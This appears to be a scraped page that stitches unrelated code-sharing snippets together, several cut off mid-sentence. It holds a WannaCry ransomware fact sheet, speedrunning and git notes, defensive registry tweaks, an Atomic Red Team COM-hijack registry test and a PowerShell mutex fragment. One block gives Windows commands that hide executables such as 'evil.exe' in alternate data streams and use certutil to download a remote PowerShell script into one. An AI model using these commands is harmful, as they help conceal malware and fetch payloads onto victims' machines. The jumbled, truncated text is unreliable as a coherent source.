John D Pell gaelicWizard

WannaCry|WannaDecrypt0r NSA-Cyberweapon-Powered Ransomware Worm

Virus Name: WannaCrypt, WannaCry, WanaCrypt0r, WCrypt, WCRY
Vector: All Windows versions before Windows 10 are vulnerable if not patched for MS-17-010. It uses EternalBlue MS17-010 to propagate.
Ransom: between $300 to $600. There is code to 'rm' (delete) files in the virus. Seems to reset if the virus crashes.
Backdooring: The worm loops through every RDP session on a system to run the ransomware as that user. It also installs the DOUBLEPULSAR backdoor. It corrupts shadow volumes to make recovery harder. (source: malwarebytes)
Kill switch: If the website www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com is up the virus exits instead of infecting the host. (source: malwarebytes). This domain has been sinkholed, stopping the spread of the worm. Will not work if proxied (source).

update: A minor variant of the viru

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

Speedrunning FAQ/Glossary

by 0xabad1dea September 2018

You may notice a decidedly Nintendo bias to the examples. I can't change who I am.

What is Speedrunning?

Speedrunning is:

Completing a video game

git cheat-sheet

The git command-line utility has plenty of inconsistencies http://steveko.wordpress.com/2012/02/24/10-things-i-hate-about-git/

A GUI like http://sourcetreeapp.com is often helpful, but staying on the command line usually quicker. This is a list of the commands I use most frequently, listed by funcional category:

current state

git status list which (unstaged) files have changed

	Windows Registry Editor Version 5.00

	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskdl.exe]
	"Debugger"="taskkill /F /IM "

	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskse.exe]
	"Debugger"="taskkill /F /IM "

	[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wannacry.exe]
	"Debugger"="taskkill /F /IM "

	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
	"DontUpdateLinks"=dword:00000001

	[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
	"DontUpdateLinks"=dword:00000001

	[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
	"DontUpdateLinks"=dword:00000001

	#!/bin/bash
	# Logging utility that simplifies user of bash logger command

	# # First source the script
	# source ~/scripts/logr.bash

	# # Start the logger, generates log name from scripts filename
	# logr start
	# # or define your own
	# logr start LOG_NAME

	Windows Registry Editor Version 5.00

	[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\BackgroundAccessApplications\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy]
	"Disabled"=dword:00000001

	[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager]
	"SubscribedContent-338388Enabled"=dword:00000000

	Windows Registry Editor Version 5.00
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam.1.00\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam]
	@="AtomicRedTeam"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicRedTeam\CLSID]
	@="{00000001-0000-0000-0000-0000FEEDACDC}"
	[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]

	$createdNew = $False;
	$mutex = New-Object -TypeName System.Threading.Mutex($true, "MsWinZonesCacheCounterMutexA", [ref]$createdNew);